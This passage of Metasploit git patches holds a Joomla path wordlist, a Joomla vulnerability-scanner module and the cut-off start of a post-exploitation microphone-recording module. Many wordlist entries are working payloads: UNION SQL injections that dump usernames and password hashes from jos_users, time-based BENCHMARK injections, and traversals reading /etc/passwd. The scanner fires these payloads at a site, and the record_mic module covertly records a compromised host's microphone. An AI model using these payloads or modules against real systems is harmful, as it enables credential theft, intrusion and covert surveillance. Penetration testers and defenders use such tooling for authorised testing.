+components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ +components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ +components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ +components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ +components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 +index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] +index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= +index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= +index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' +index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube +index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb new file mode 100755 index 000000000000..c8cbfbae27f9 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -0,0 +1,270 @@ +## +# $Id: joomla_vulnscan.rb +## +## +#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Joomla Scanner', + 'Version' => '$Revision: 14774 $', + 'Description' => %q{ + This module scans the Joomla install for information and potential vulnerabilites. + }, + 'Author' => [ 'f8lerror' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), + + OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", + File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + ] + ) + + ], self.class) + end + + def osfingerprint(response) + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) + os = "Windows" + elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + end + return os + end + def fingerprint(response, app) + + if(response.body =~ /(.+)<\/version\/?>/i) + v = $1 + out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" + elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or + response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or + response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) + out = "1.6" + elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) + out = "1.7" + elsif(response.body =~ /Joomla! 1.5/ or + response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) + out = "1.5" + elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or + response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) + out = "2.5" + elsif(response.body =~ /\s+ tpath, + 'method' => 'GET', + }, 5) + return if not bres or not bres.body or not bres.code + bres.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| + papp = bapp.chomp + plugin_search(tpath,papp,ip,bres) + end + end + + end + def check_app(tpath, app, ip) + res = send_request_cgi({ + 'uri' => tpath+app, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + os = osfingerprint(res) + if (res.code.to_i == 200) + out = fingerprint(res,app) + return if not out + if(out =~ /Unknown Joomla/) + print_error("Unable to identify Joomla Version with this file #{app}") + return false + else + print_good("Joomla Version:#{out} from: #{app} ") + print_good("OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Version', + :data => out + ) + return true + end + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def scan_pages(tpath,iapp, ip) + res = send_request_cgi({ + 'uri' => tpath+iapp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + if (res.code.to_i == 200) + if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) + sout = "Administrator Login Page" + elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/) + sout = "Registration Page" + else + sout = iapp + end + return if not sout + if(sout == iapp) + print_good("#{iapp}") + elsif print_good("#{sout}: #{iapp} ") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Pages', + :data => sout + ) + end + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + def plugin_search(tpath,papp, ip, bres) + res = send_request_cgi({ + 'uri' => tpath+papp, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + osize = bres.body.size + nsize = res.body.size + if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("Found Plugin: #{papp} ") + if (papp =~/passwd/ and res.body !~/root/) + print_error("\tPasswd not found") + elsif(papp =~/passwd/ and res.body =~/root/) + print_good("\tPasswd file found in response") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) + print_good("\tPossible SQL Injection") + elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) + print_error("\tUnable to identify SQL injection") + elsif(papp =~/>alert/ and res.body !~/>alert/) + print_error("\tNo XSS") + elsif(papp =~/>alert/ and res.body =~/>alert/) + print_good("\tPossible XSS") + elsif(res.body =~/SQL syntax/ ) + print_error("\tPossible SQL Injection") + elsif(papp =~/com_/) + blah = papp.split('_') + blah1 = blah[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => tpath+"index.php?option=com_#{blah1}", + 'method' => 'GET', + }, 5) + if (res1.code.to_i == 200) + print_status("\tFound_page: index.php?option=com_#{blah1}") + end + end + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Plugin Found', + :data => papp + ) + elsif(res.code.to_i == 403 and datastore['VERBOSE']) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + print_status("#{ip} denied access to #{url} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + print_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + print_status("#{ip} requires a SSL client certificate") + else + print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + end + end + + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + + + +end From f351db3621a7af24a3f17b50c35f1e5320971237 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 17 Jan 2013 12:19:52 -0600 Subject: [PATCH 051/421] Implements the record_mic feature as a post module For easier deployment in the web GUI. Works for Windows meterpreter and Java meterpreter. --- modules/post/multi/manage/record_mic.rb | 78 +++++++++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/post/multi/manage/record_mic.rb diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb new file mode 100644 index 000000000000..134ad0fbeda2 --- /dev/null +++ b/modules/post/multi/manage/record_mic.rb @@ -0,0 +1,78 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Multi Manage Record Microphone', + 'Description' => %q{ + This module will enable and record your target's microphone. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'win'], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options( + [ + OptInt.new('DURATION', [false, 'Number of seconds to record', 5]) + ], self.class) + end + + def rhost + client.sock.peerhost + end + + def progress + timeout = (datastore['DURATION'] < 1) ? 1 : (datastore['DURATION']*0.1) + datastore['DURATION'].times do |i| + print_status("Recording: #{(Float(i+1)/datastore['DURATION'] * 100).round}% done...") + select(nil, nil, nil, timeout) + end + end + + def run + if client.nil? + print_error("Invalid session ID selected. Make sure the host isn't 